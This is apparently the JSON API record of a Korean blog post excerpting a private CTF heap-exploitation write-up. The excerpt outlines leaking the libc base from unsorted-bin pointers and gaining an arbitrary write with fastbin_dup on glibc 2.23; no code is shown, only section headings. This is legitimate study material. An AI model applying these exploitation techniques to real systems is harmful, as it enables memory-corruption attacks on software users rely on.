                  \uc694\uc57d \ud574\ub2f9 \ub0b4\uc6a9\uc740 GLIBC 2.23-0ubuntu11.3 \/ ubuntu 16.04 \ud658\uacbd\uc5d0\uc11c unsorted bin\uc5d0 \ub0a8\uaca8\uc9c4 fd, bk \uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c\ub97c \uad6c\ud558\uace0, fastbin_dup\uc73c\ub85c AAW \uc2e4\uc2b5\uc744 \ud55c \ub0b4\uc6a9\uc774\ub2e4. \uc774\ub2f9\uc2dc\ub54c\ub294 tcache\uc640 safe-linking \uae30\ubc95\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\uc558\ub2e4. checksec Analysis 1. Leak Libc address 2. AAW using fastbin_dup technique unsorted bin\uc73c\ub85c\ubd80\ud130 \ub2e4\uc2dc fastbin\uc73c\ub85c\ubd80\ud130 \ud560\ub2f9\ubc1b\uace0, \ub098\uba38\uc9c0 2\uac1c\ub3c4 fastbin\uc73c\ub85c \ud560\ub2f9. solve.py Result<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[54,55,35,25],"class_list":["post-3615","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-fastbin_dup","tag-glibc2-23","tag-heap","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3615","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3615"}],"version-history":[{"count":3,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3615\/revisions"}],"predecessor-version":[{"id":3647,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3615\/revisions\/3647"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3615"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3615"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3615"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}